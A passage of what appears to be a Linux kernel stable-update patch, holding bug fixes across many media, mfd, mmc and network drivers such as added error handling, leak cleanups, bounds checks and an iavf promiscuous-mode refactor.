+@@ -193,9 +209,10 @@ static struct vpu_msg_handler handlers[] = {
+ 	{VPU_MSG_ID_PIC_DECODED, vpu_session_handle_pic_decoded},
+ 	{VPU_MSG_ID_DEC_DONE, vpu_session_handle_pic_done},
+ 	{VPU_MSG_ID_PIC_EOS, vpu_session_handle_eos},
+-	{VPU_MSG_ID_UNSUPPORTED, vpu_session_handle_error},
+-	{VPU_MSG_ID_FIRMWARE_XCPT, vpu_session_handle_firmware_xcpt},
++	{VPU_MSG_ID_UNSUPPORTED, vpu_session_handle_error, true},
++	{VPU_MSG_ID_FIRMWARE_XCPT, vpu_session_handle_firmware_xcpt, true},
+ 	{VPU_MSG_ID_PIC_SKIPPED, vpu_session_handle_pic_skipped},
++	{VPU_MSG_ID_DBG_MSG, vpu_session_handle_dbg_msg, true},
+ };
+ 
+ static int vpu_session_handle_msg(struct vpu_inst *inst, struct vpu_rpc_event *msg)
+@@ -219,8 +236,12 @@ static int vpu_session_handle_msg(struct vpu_inst *inst, struct vpu_rpc_event *m
+ 		}
+ 	}
+ 
+-	if (handler && handler->done)
+-		handler->done(inst, msg);
++	if (handler) {
++		if (handler->is_str)
++			vpu_terminate_string_msg(msg);
++		if (handler->done)
++			handler->done(inst, msg);
++	}
+ 
+ 	vpu_response_cmd(inst, msg_id, 1);
+ 
+diff --git a/drivers/media/platform/cadence/cdns-csi2rx.c b/drivers/media/platform/cadence/cdns-csi2rx.c
+index cc3ebb0d96f66..2a23da6a0b8ee 100644
+--- a/drivers/media/platform/cadence/cdns-csi2rx.c
++++ b/drivers/media/platform/cadence/cdns-csi2rx.c
+@@ -404,8 +404,10 @@ static int csi2rx_parse_dt(struct csi2rx_priv *csi2rx)
+ 	asd = v4l2_async_nf_add_fwnode_remote(&csi2rx->notifier, fwh,
+ 					      struct v4l2_async_subdev);
+ 	of_node_put(ep);
+-	if (IS_ERR(asd))
++	if (IS_ERR(asd)) {
++		v4l2_async_nf_cleanup(&csi2rx->notifier);
+ 		return PTR_ERR(asd);
++	}
+ 
+ 	csi2rx->notifier.ops = &csi2rx_notifier_ops;
+ 
+@@ -467,6 +469,7 @@ static int csi2rx_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ err_cleanup:
++	v4l2_async_nf_unregister(&csi2rx->notifier);
+ 	v4l2_async_nf_cleanup(&csi2rx->notifier);
+ err_free_priv:
+ 	kfree(csi2rx);
+@@ -477,6 +480,8 @@ static int csi2rx_remove(struct platform_device *pdev)
+ {
+ 	struct csi2rx_priv *csi2rx = platform_get_drvdata(pdev);
+ 
++	v4l2_async_nf_unregister(&csi2rx->notifier);
++	v4l2_async_nf_cleanup(&csi2rx->notifier);
+ 	v4l2_async_unregister_subdev(&csi2rx->subdev);
+ 	kfree(csi2rx);
+ 
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
+index 1cf037bf72dda..8c271c38caf73 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_enc_hw.c
+@@ -98,6 +98,7 @@ void mtk_jpeg_set_enc_params(struct mtk_jpeg_ctx *ctx,  void __iomem *base)
+ 	u32 img_stride;
+ 	u32 mem_stride;
+ 	u32 i, enc_quality;
++	u32 nr_enc_quality = ARRAY_SIZE(mtk_jpeg_enc_quality);
+ 
+ 	value = width << 16 | height;
+ 	writel(value, base + JPEG_ENC_IMG_SIZE);
+@@ -128,8 +129,8 @@ void mtk_jpeg_set_enc_params(struct mtk_jpeg_ctx *ctx,  void __iomem *base)
+ 	writel(img_stride, base + JPEG_ENC_IMG_STRIDE);
+ 	writel(mem_stride, base + JPEG_ENC_STRIDE);
+ 
+-	enc_quality = mtk_jpeg_enc_quality[0].hardware_value;
+-	for (i = 0; i < ARRAY_SIZE(mtk_jpeg_enc_quality); i++) {
++	enc_quality = mtk_jpeg_enc_quality[nr_enc_quality - 1].hardware_value;
++	for (i = 0; i < nr_enc_quality; i++) {
+ 		if (ctx->enc_quality <= mtk_jpeg_enc_quality[i].quality_param) {
+ 			enc_quality = mtk_jpeg_enc_quality[i].hardware_value;
+ 			break;
+diff --git a/drivers/media/platform/samsung/s3c-camif/camif-capture.c b/drivers/media/platform/samsung/s3c-camif/camif-capture.c
+index db106ebdf870a..bca3cae4dd8bb 100644
+--- a/drivers/media/platform/samsung/s3c-camif/camif-capture.c
++++ b/drivers/media/platform/samsung/s3c-camif/camif-capture.c
+@@ -1132,12 +1132,12 @@ int s3c_camif_register_video_node(struct camif_dev *camif, int idx)
+ 
+ 	ret = vb2_queue_init(q);
+ 	if (ret)
+-		goto err_vd_rel;
++		return ret;
+ 
+ 	vp->pad.flags = MEDIA_PAD_FL_SINK;
+ 	ret = media_entity_pads_init(&vfd->entity, 1, &vp->pad);
+ 	if (ret)
+-		goto err_vd_rel;
++		return ret;
+ 
+ 	video_set_drvdata(vfd, vp);
+ 
+@@ -1170,8 +1170,6 @@ err_ctrlh_free:
+ 	v4l2_ctrl_handler_free(&vp->ctrl_handler);
+ err_me_cleanup:
+ 	media_entity_cleanup(&vfd->entity);
+-err_vd_rel:
+-	video_device_release(vfd);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/media/platform/verisilicon/hantro_drv.c b/drivers/media/platform/verisilicon/hantro_drv.c
+index 8cb4a68c9119e..08840ba313e7a 100644
+--- a/drivers/media/platform/verisilicon/hantro_drv.c
++++ b/drivers/media/platform/verisilicon/hantro_drv.c
+@@ -125,7 +125,8 @@ void hantro_watchdog(struct work_struct *work)
+ 	ctx = v4l2_m2m_get_curr_priv(vpu->m2m_dev);
+ 	if (ctx) {
+ 		vpu_err("frame processing timed out!\n");
+-		ctx->codec_ops->reset(ctx);
++		if (ctx->codec_ops->reset)
++			ctx->codec_ops->reset(ctx);
+ 		hantro_job_finish(vpu, ctx, VB2_BUF_STATE_ERROR);
+ 	}
+ }
+diff --git a/drivers/media/platform/verisilicon/hantro_postproc.c b/drivers/media/platform/verisilicon/hantro_postproc.c
+index 09d8cf9426895..708095cf09fe2 100644
+--- a/drivers/media/platform/verisilicon/hantro_postproc.c
++++ b/drivers/media/platform/verisilicon/hantro_postproc.c
+@@ -103,7 +103,7 @@ static void hantro_postproc_g1_enable(struct hantro_ctx *ctx)
+ 
+ static int down_scale_factor(struct hantro_ctx *ctx)
+ {
+-	if (ctx->src_fmt.width == ctx->dst_fmt.width)
++	if (ctx->src_fmt.width <= ctx->dst_fmt.width)
+ 		return 0;
+ 
+ 	return DIV_ROUND_CLOSEST(ctx->src_fmt.width, ctx->dst_fmt.width);
+diff --git a/drivers/media/test-drivers/vidtv/vidtv_mux.c b/drivers/media/test-drivers/vidtv/vidtv_mux.c
+index b51e6a3b8cbeb..f99878eff7ace 100644
+--- a/drivers/media/test-drivers/vidtv/vidtv_mux.c
++++ b/drivers/media/test-drivers/vidtv/vidtv_mux.c
+@@ -504,13 +504,16 @@ struct vidtv_mux *vidtv_mux_init(struct dvb_frontend *fe,
+ 	m->priv = args->priv;
+ 	m->network_id = args->network_id;
+ 	m->network_name = kstrdup(args->network_name, GFP_KERNEL);
++	if (!m->network_name)
++		goto free_mux_buf;
++
+ 	m->timing.current_jiffies = get_jiffies_64();
+ 
+ 	if (args->channels)
+ 		m->channels = args->channels;
+ 	else
+ 		if (vidtv_channels_init(m) < 0)
+-			goto free_mux_buf;
++			goto free_mux_network_name;
+ 
+ 	/* will alloc data for pmt_sections after initializing pat */
+ 	if (vidtv_channel_si_init(m) < 0)
+@@ -527,6 +530,8 @@ free_channel_si:
+ 	vidtv_channel_si_destroy(m);
+ free_channels:
+ 	vidtv_channels_destroy(m);
++free_mux_network_name:
++	kfree(m->network_name);
+ free_mux_buf:
+ 	vfree(m->mux_buf);
+ free_mux:
+diff --git a/drivers/media/test-drivers/vidtv/vidtv_psi.c b/drivers/media/test-drivers/vidtv/vidtv_psi.c
+index a5875380ef407..c45828bc5b278 100644
+--- a/drivers/media/test-drivers/vidtv/vidtv_psi.c
++++ b/drivers/media/test-drivers/vidtv/vidtv_psi.c
+@@ -301,16 +301,29 @@ struct vidtv_psi_desc_service *vidtv_psi_service_desc_init(struct vidtv_psi_desc
+ 
+ 	desc->service_name_len = service_name_len;
+ 
+-	if (service_name && service_name_len)
++	if (service_name && service_name_len) {
+ 		desc->service_name = kstrdup(service_name, GFP_KERNEL);
++		if (!desc->service_name)
++			goto free_desc;
++	}
+ 
+ 	desc->provider_name_len = provider_name_len;
+ 
+-	if (provider_name && provider_name_len)
++	if (provider_name && provider_name_len) {
+ 		desc->provider_name = kstrdup(provider_name, GFP_KERNEL);
++		if (!desc->provider_name)
++			goto free_desc_service_name;
++	}
+ 
+ 	vidtv_psi_desc_chain(head, (struct vidtv_psi_desc *)desc);
+ 	return desc;
++
++free_desc_service_name:
++	if (service_name && service_name_len)
++		kfree(desc->service_name);
++free_desc:
++	kfree(desc);
++	return NULL;
+ }
+ 
+ struct vidtv_psi_desc_registration
+@@ -355,8 +368,13 @@ struct vidtv_psi_desc_network_name
+ 
+ 	desc->length = network_name_len;
+ 
+-	if (network_name && network_name_len)
++	if (network_name && network_name_len) {
+ 		desc->network_name = kstrdup(network_name, GFP_KERNEL);
++		if (!desc->network_name) {
++			kfree(desc);
++			return NULL;
++		}
++	}
+ 
+ 	vidtv_psi_desc_chain(head, (struct vidtv_psi_desc *)desc);
+ 	return desc;
+@@ -442,15 +460,32 @@ struct vidtv_psi_desc_short_event
+ 		iso_language_code = "eng";
+ 
+ 	desc->iso_language_code = kstrdup(iso_language_code, GFP_KERNEL);
++	if (!desc->iso_language_code)
++		goto free_desc;
+ 
+-	if (event_name && event_name_len)
++	if (event_name && event_name_len) {
+ 		desc->event_name = kstrdup(event_name, GFP_KERNEL);
++		if (!desc->event_name)
++			goto free_desc_language_code;
++	}
+ 
+-	if (text && text_len)
++	if (text && text_len) {
+ 		desc->text = kstrdup(text, GFP_KERNEL);
++		if (!desc->text)
++			goto free_desc_event_name;
++	}
+ 
+ 	vidtv_psi_desc_chain(head, (struct vidtv_psi_desc *)desc);
+ 	return desc;
++
++free_desc_event_name:
++	if (event_name && event_name_len)
++		kfree(desc->event_name);
++free_desc_language_code:
++	kfree(desc->iso_language_code);
++free_desc:
++	kfree(desc);
++	return NULL;
+ }
+ 
+ struct vidtv_psi_desc *vidtv_psi_desc_clone(struct vidtv_psi_desc *desc)
+diff --git a/drivers/media/usb/dvb-usb-v2/af9035.c b/drivers/media/usb/dvb-usb-v2/af9035.c
+index cd6f5374414d4..5f9dec71ff6e0 100644
+--- a/drivers/media/usb/dvb-usb-v2/af9035.c
++++ b/drivers/media/usb/dvb-usb-v2/af9035.c
+@@ -323,8 +323,10 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 			ret = -EOPNOTSUPP;
+ 		} else if ((msg[0].addr == state->af9033_i2c_addr[0]) ||
+ 			   (msg[0].addr == state->af9033_i2c_addr[1])) {
+-			if (msg[0].len < 3 || msg[1].len < 1)
+-				return -EOPNOTSUPP;
++			if (msg[0].len < 3 || msg[1].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto unlock;
++			}
+ 			/* demod access via firmware interface */
+ 			reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
+ 					msg[0].buf[2];
+@@ -384,8 +386,10 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 			ret = -EOPNOTSUPP;
+ 		} else if ((msg[0].addr == state->af9033_i2c_addr[0]) ||
+ 			   (msg[0].addr == state->af9033_i2c_addr[1])) {
+-			if (msg[0].len < 3)
+-				return -EOPNOTSUPP;
++			if (msg[0].len < 3) {
++				ret = -EOPNOTSUPP;
++				goto unlock;
++			}
+ 			/* demod access via firmware interface */
+ 			reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
+ 					msg[0].buf[2];
+@@ -460,6 +464,7 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 		ret = -EOPNOTSUPP;
+ 	}
+ 
++unlock:
+ 	mutex_unlock(&d->i2c_mutex);
+ 
+ 	if (ret < 0)
+diff --git a/drivers/mfd/arizona-spi.c b/drivers/mfd/arizona-spi.c
+index 5c4af05ed0440..3f83a77ce69e7 100644
+--- a/drivers/mfd/arizona-spi.c
++++ b/drivers/mfd/arizona-spi.c
+@@ -159,6 +159,9 @@ static int arizona_spi_acpi_probe(struct arizona *arizona)
+ 	arizona->pdata.micd_ranges = arizona_micd_aosp_ranges;
+ 	arizona->pdata.num_micd_ranges = ARRAY_SIZE(arizona_micd_aosp_ranges);
+ 
++	/* Use left headphone speaker for HP vs line-out detection */
++	arizona->pdata.hpdet_channel = ARIZONA_ACCDET_MODE_HPL;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/mfd/dln2.c b/drivers/mfd/dln2.c
+index c3149729cec2e..6cd0b0c752d6e 100644
+--- a/drivers/mfd/dln2.c
++++ b/drivers/mfd/dln2.c
+@@ -827,7 +827,6 @@ out_stop_rx:
+ 	dln2_stop_rx_urbs(dln2);
+ 
+ out_free:
+-	usb_put_dev(dln2->usb_dev);
+ 	dln2_free(dln2);
+ 
+ 	return ret;
+diff --git a/drivers/mfd/mfd-core.c b/drivers/mfd/mfd-core.c
+index 16d1861e96823..97909e3e2c303 100644
+--- a/drivers/mfd/mfd-core.c
++++ b/drivers/mfd/mfd-core.c
+@@ -176,6 +176,7 @@ static int mfd_add_device(struct device *parent, int id,
+ 	struct platform_device *pdev;
+ 	struct device_node *np = NULL;
+ 	struct mfd_of_node_entry *of_entry, *tmp;
++	bool disabled = false;
+ 	int ret = -ENOMEM;
+ 	int platform_id;
+ 	int r;
+@@ -213,11 +214,10 @@ static int mfd_add_device(struct device *parent, int id,
+ 	if (IS_ENABLED(CONFIG_OF) && parent->of_node && cell->of_compatible) {
+ 		for_each_child_of_node(parent->of_node, np) {
+ 			if (of_device_is_compatible(np, cell->of_compatible)) {
+-				/* Ignore 'disabled' devices error free */
++				/* Skip 'disabled' devices */
+ 				if (!of_device_is_available(np)) {
+-					of_node_put(np);
+-					ret = 0;
+-					goto fail_alias;
++					disabled = true;
++					continue;
+ 				}
+ 
+ 				ret = mfd_match_of_node_to_dev(pdev, np, cell);
+@@ -227,10 +227,17 @@ static int mfd_add_device(struct device *parent, int id,
+ 				if (ret)
+ 					goto fail_alias;
+ 
+-				break;
++				goto match;
+ 			}
+ 		}
+ 
++		if (disabled) {
++			/* Ignore 'disabled' devices error free */
++			ret = 0;
++			goto fail_alias;
++		}
++
++match:
+ 		if (!pdev->dev.of_node)
+ 			pr_warn("%s: Failed to locate of_node [id: %d]\n",
+ 				cell->name, platform_id);
+diff --git a/drivers/misc/ti-st/st_core.c b/drivers/misc/ti-st/st_core.c
+index 7f6976a9f508b..48e0f8377e659 100644
+--- a/drivers/misc/ti-st/st_core.c
++++ b/drivers/misc/ti-st/st_core.c
+@@ -15,6 +15,7 @@
+ #include <linux/skbuff.h>
+ 
+ #include <linux/ti_wilink_st.h>
++#include <linux/netdevice.h>
+ 
+ extern void st_kim_recv(void *, const unsigned char *, long);
+ void st_int_recv(void *, const unsigned char *, long);
+@@ -435,7 +436,7 @@ static void st_int_enqueue(struct st_data_s *st_gdata, struct sk_buff *skb)
+ 	case ST_LL_AWAKE_TO_ASLEEP:
+ 		pr_err("ST LL is illegal state(%ld),"
+ 			   "purging received skb.", st_ll_getstate(st_gdata));
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		break;
+ 	case ST_LL_ASLEEP:
+ 		skb_queue_tail(&st_gdata->tx_waitq, skb);
+@@ -444,7 +445,7 @@ static void st_int_enqueue(struct st_data_s *st_gdata, struct sk_buff *skb)
+ 	default:
+ 		pr_err("ST LL is illegal state(%ld),"
+ 			   "purging received skb.", st_ll_getstate(st_gdata));
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		break;
+ 	}
+ 
+@@ -498,7 +499,7 @@ void st_tx_wakeup(struct st_data_s *st_data)
+ 				spin_unlock_irqrestore(&st_data->lock, flags);
+ 				break;
+ 			}
+-			kfree_skb(skb);
++			dev_kfree_skb_irq(skb);
+ 			spin_unlock_irqrestore(&st_data->lock, flags);
+ 		}
+ 		/* if wake-up is set in another context- restart sending */
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index 4a4bab9aa7263..89cd48fcec79f 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -104,7 +104,7 @@ static int mmc_decode_cid(struct mmc_card *card)
+ 	case 3: /* MMC v3.1 - v3.3 */
+ 	case 4: /* MMC v4 */
+ 		card->cid.manfid	= UNSTUFF_BITS(resp, 120, 8);
+-		card->cid.oemid		= UNSTUFF_BITS(resp, 104, 8);
++		card->cid.oemid		= UNSTUFF_BITS(resp, 104, 16);
+ 		card->cid.prod_name[0]	= UNSTUFF_BITS(resp, 96, 8);
+ 		card->cid.prod_name[1]	= UNSTUFF_BITS(resp, 88, 8);
+ 		card->cid.prod_name[2]	= UNSTUFF_BITS(resp, 80, 8);
+diff --git a/drivers/net/can/dev/dev.c b/drivers/net/can/dev/dev.c
+index c1956b1e9faf7..f685479eda1be 100644
+--- a/drivers/net/can/dev/dev.c
++++ b/drivers/net/can/dev/dev.c
+@@ -132,7 +132,8 @@ static void can_restart(struct net_device *dev)
+ 	struct can_frame *cf;
+ 	int err;
+ 
+-	BUG_ON(netif_carrier_ok(dev));
++	if (netif_carrier_ok(dev))
++		netdev_err(dev, "Attempt to restart for bus-off recovery, but carrier is OK?\n");
+ 
+ 	/* No synchronization needed because the device is bus-off and
+ 	 * no messages can come in or go out.
+@@ -153,11 +154,12 @@ restart:
+ 	priv->can_stats.restarts++;
+ 
+ 	/* Now restart the device */
+-	err = priv->do_set_mode(dev, CAN_MODE_START);
+-
+ 	netif_carrier_on(dev);
+-	if (err)
++	err = priv->do_set_mode(dev, CAN_MODE_START);
++	if (err) {
+ 		netdev_err(dev, "Error %d during restart", err);
++		netif_carrier_off(dev);
++	}
+ }
+ 
+ static void can_restart_work(struct work_struct *work)
+diff --git a/drivers/net/can/dev/skb.c b/drivers/net/can/dev/skb.c
+index f6d05b3ef59ab..3ebd4f779b9bd 100644
+--- a/drivers/net/can/dev/skb.c
++++ b/drivers/net/can/dev/skb.c
+@@ -49,7 +49,11 @@ int can_put_echo_skb(struct sk_buff *skb, struct net_device *dev,
+ {
+ 	struct can_priv *priv = netdev_priv(dev);
+ 
+-	BUG_ON(idx >= priv->echo_skb_max);
++	if (idx >= priv->echo_skb_max) {
++		netdev_err(dev, "%s: BUG! Trying to access can_priv::echo_skb out of bounds (%u/max %u)\n",
++			   __func__, idx, priv->echo_skb_max);
++		return -EINVAL;
++	}
+ 
+ 	/* check flag whether this packet has to be looped back */
+ 	if (!(dev->flags & IFF_ECHO) ||
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index 9609041016776..85570e40c8e9b 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -18086,7 +18086,8 @@ static void tg3_shutdown(struct pci_dev *pdev)
+ 	if (netif_running(dev))
+ 		dev_close(dev);
+ 
+-	tg3_power_down(tp);
++	if (system_state == SYSTEM_POWER_OFF)
++		tg3_power_down(tp);
+ 
+ 	rtnl_unlock();
+ 
+diff --git a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
+index 7750702900fa6..6f6525983130e 100644
+--- a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
++++ b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
+@@ -2259,7 +2259,7 @@ static void chtls_rx_ack(struct sock *sk, struct sk_buff *skb)
+ 
+ 		if (tp->snd_una != snd_una) {
+ 			tp->snd_una = snd_una;
+-			tp->rcv_tstamp = tcp_time_stamp(tp);
++			tp->rcv_tstamp = tcp_jiffies32;
+ 			if (tp->snd_una == tp->snd_nxt &&
+ 			    !csk_flag_nochk(csk, CSK_TX_FAILOVER))
+ 				csk_reset_flag(csk, CSK_TX_WAIT_IDLE);
+diff --git a/drivers/net/ethernet/google/gve/gve_main.c b/drivers/net/ethernet/google/gve/gve_main.c
+index 2e5e0a8872704..d3f6ad586ba1b 100644
+--- a/drivers/net/ethernet/google/gve/gve_main.c
++++ b/drivers/net/ethernet/google/gve/gve_main.c
+@@ -139,7 +139,7 @@ static int gve_alloc_stats_report(struct gve_priv *priv)
+ 	rx_stats_num = (GVE_RX_STATS_REPORT_NUM + NIC_RX_STATS_REPORT_NUM) *
+ 		       priv->rx_cfg.num_queues;
+ 	priv->stats_report_len = struct_size(priv->stats_report, stats,
+-					     tx_stats_num + rx_stats_num);
++					     size_add(tx_stats_num, rx_stats_num));
+ 	priv->stats_report =
+ 		dma_alloc_coherent(&priv->pdev->dev, priv->stats_report_len,
+ 				   &priv->stats_report_bus, GFP_KERNEL);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 08ccf0024ce1a..68ee2c59692d1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -16283,11 +16283,15 @@ static void i40e_remove(struct pci_dev *pdev)
+ 			i40e_switch_branch_release(pf->veb[i]);
+ 	}
+ 
+-	/* Now we can shutdown the PF's VSI, just before we kill
++	/* Now we can shutdown the PF's VSIs, just before we kill
+ 	 * adminq and hmc.
+ 	 */
+-	if (pf->vsi[pf->lan_vsi])
+-		i40e_vsi_release(pf->vsi[pf->lan_vsi]);
++	for (i = pf->num_alloc_vsi; i--;)
++		if (pf->vsi[i]) {
++			i40e_vsi_close(pf->vsi[i]);
++			i40e_vsi_release(pf->vsi[i]);
++			pf->vsi[i] = NULL;
++		}
+ 
+ 	i40e_cloud_filter_exit(pf);
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 06cfd567866c2..7389855fa307a 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -298,8 +298,6 @@ struct iavf_adapter {
+ #define IAVF_FLAG_CLIENT_NEEDS_OPEN		BIT(10)
+ #define IAVF_FLAG_CLIENT_NEEDS_CLOSE		BIT(11)
+ #define IAVF_FLAG_CLIENT_NEEDS_L2_PARAMS	BIT(12)
+-#define IAVF_FLAG_PROMISC_ON			BIT(13)
+-#define IAVF_FLAG_ALLMULTI_ON			BIT(14)
+ #define IAVF_FLAG_LEGACY_RX			BIT(15)
+ #define IAVF_FLAG_REINIT_ITR_NEEDED		BIT(16)
+ #define IAVF_FLAG_QUEUES_DISABLED		BIT(17)
+@@ -325,10 +323,7 @@ struct iavf_adapter {
+ #define IAVF_FLAG_AQ_SET_HENA			BIT_ULL(12)
+ #define IAVF_FLAG_AQ_SET_RSS_KEY		BIT_ULL(13)
+ #define IAVF_FLAG_AQ_SET_RSS_LUT		BIT_ULL(14)
+-#define IAVF_FLAG_AQ_REQUEST_PROMISC		BIT_ULL(15)
+-#define IAVF_FLAG_AQ_RELEASE_PROMISC		BIT_ULL(16)
+-#define IAVF_FLAG_AQ_REQUEST_ALLMULTI		BIT_ULL(17)
+-#define IAVF_FLAG_AQ_RELEASE_ALLMULTI		BIT_ULL(18)
++#define IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE	BIT_ULL(15)
+ #define IAVF_FLAG_AQ_ENABLE_VLAN_STRIPPING	BIT_ULL(19)
+ #define IAVF_FLAG_AQ_DISABLE_VLAN_STRIPPING	BIT_ULL(20)
+ #define IAVF_FLAG_AQ_ENABLE_CHANNELS		BIT_ULL(21)
+@@ -365,6 +360,12 @@ struct iavf_adapter {
+ 	(IAVF_EXTENDED_CAP_SEND_VLAN_V2 |		\
+ 	 IAVF_EXTENDED_CAP_RECV_VLAN_V2)
+ 
++	/* Lock to prevent possible clobbering of
++	 * current_netdev_promisc_flags
++	 */
++	spinlock_t current_netdev_promisc_flags_lock;
++	netdev_features_t current_netdev_promisc_flags;
++
+ 	/* OS defined structs */
+ 	struct net_device *netdev;
+ 	struct pci_dev *pdev;
+@@ -551,7 +552,8 @@ void iavf_add_ether_addrs(struct iavf_adapter *adapter);
+ void iavf_del_ether_addrs(struct iavf_adapter *adapter);
+ void iavf_add_vlans(struct iavf_adapter *adapter);
+ void iavf_del_vlans(struct iavf_adapter *adapter);
+-void iavf_set_promiscuous(struct iavf_adapter *adapter, int flags);
++void iavf_set_promiscuous(struct iavf_adapter *adapter);
++bool iavf_promiscuous_mode_changed(struct iavf_adapter *adapter);
+ void iavf_request_stats(struct iavf_adapter *adapter);
+ int iavf_request_reset(struct iavf_adapter *adapter);
+ void iavf_get_hena(struct iavf_adapter *adapter);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 326bb5fdf5f90..4836bac2bd09d 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -1198,6 +1198,16 @@ static int iavf_addr_unsync(struct net_device *netdev, const u8 *addr)
+ 	return 0;
+ }
+ 
++/**
++ * iavf_promiscuous_mode_changed - check if promiscuous mode bits changed
++ * @adapter: device specific adapter
++ */
++bool iavf_promiscuous_mode_changed(struct iavf_adapter *adapter)
++{
++	return (adapter->current_netdev_promisc_flags ^ adapter->netdev->flags) &
++		(IFF_PROMISC | IFF_ALLMULTI);
++}
++
+ /**
+  * iavf_set_rx_mode - NDO callback to set the netdev filters
+  * @netdev: network interface device structure
+@@ -1211,19 +1221,10 @@ static void iavf_set_rx_mode(struct net_device *netdev)
+ 	__dev_mc_sync(netdev, iavf_addr_sync, iavf_addr_unsync);
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
+-	if (netdev->flags & IFF_PROMISC &&
+-	    !(adapter->flags & IAVF_FLAG_PROMISC_ON))
+-		adapter->aq_required |= IAVF_FLAG_AQ_REQUEST_PROMISC;
+-	else if (!(netdev->flags & IFF_PROMISC) &&
+-		 adapter->flags & IAVF_FLAG_PROMISC_ON)
+-		adapter->aq_required |= IAVF_FLAG_AQ_RELEASE_PROMISC;
+-
+-	if (netdev->flags & IFF_ALLMULTI &&
+-	    !(adapter->flags & IAVF_FLAG_ALLMULTI_ON))
+-		adapter->aq_required |= IAVF_FLAG_AQ_REQUEST_ALLMULTI;
+-	else if (!(netdev->flags & IFF_ALLMULTI) &&
+-		 adapter->flags & IAVF_FLAG_ALLMULTI_ON)
+-		adapter->aq_required |= IAVF_FLAG_AQ_RELEASE_ALLMULTI;
++	spin_lock_bh(&adapter->current_netdev_promisc_flags_lock);
++	if (iavf_promiscuous_mode_changed(adapter))
++		adapter->aq_required |= IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE;
++	spin_unlock_bh(&adapter->current_netdev_promisc_flags_lock);
+ }
+ 
+ /**
+@@ -2174,19 +2175,8 @@ static int iavf_process_aq_command(struct iavf_adapter *adapter)
+ 		return 0;
+ 	}
+ 
+-	if (adapter->aq_required & IAVF_FLAG_AQ_REQUEST_PROMISC) {
+-		iavf_set_promiscuous(adapter, FLAG_VF_UNICAST_PROMISC |
+-				       FLAG_VF_MULTICAST_PROMISC);
+-		return 0;
+-	}
+-
+-	if (adapter->aq_required & IAVF_FLAG_AQ_REQUEST_ALLMULTI) {
+-		iavf_set_promiscuous(adapter, FLAG_VF_MULTICAST_PROMISC);
+-		return 0;
+-	}
+-	if ((adapter->aq_required & IAVF_FLAG_AQ_RELEASE_PROMISC) ||
+-	    (adapter->aq_required & IAVF_FLAG_AQ_RELEASE_ALLMULTI)) {
+-		iavf_set_promiscuous(adapter, 0);
++	if (adapter->aq_required & IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE) {
++		iavf_set_promiscuous(adapter);
+ 		return 0;
+ 	}
+ 
+@@ -5008,6 +4998,7 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	spin_lock_init(&adapter->cloud_filter_list_lock);
+ 	spin_lock_init(&adapter->fdir_fltr_lock);
+ 	spin_lock_init(&adapter->adv_rss_lock);
++	spin_lock_init(&adapter->current_netdev_promisc_flags_lock);
+ 
+ 	INIT_LIST_HEAD(&adapter->mac_filter_list);
+ 	INIT_LIST_HEAD(&adapter->vlan_filter_list);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 2fc8e60ef6afb..5a66b05c03222 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -948,14 +948,14 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ /**
+  * iavf_set_promiscuous
+  * @adapter: adapter structure
+- * @flags: bitmask to control unicast/multicast promiscuous.
+  *
+  * Request that the PF enable promiscuous mode for our VSI.
+  **/
+-void iavf_set_promiscuous(struct iavf_adapter *adapter, int flags)
++void iavf_set_promiscuous(struct iavf_adapter *adapter)
+ {
++	struct net_device *netdev = adapter->netdev;
+ 	struct virtchnl_promisc_info vpi;
+-	int promisc_all;
++	unsigned int flags;
+ 
+ 	if (adapter->current_op != VIRTCHNL_OP_UNKNOWN) {
+ 		/* bail because we already have a command pending */
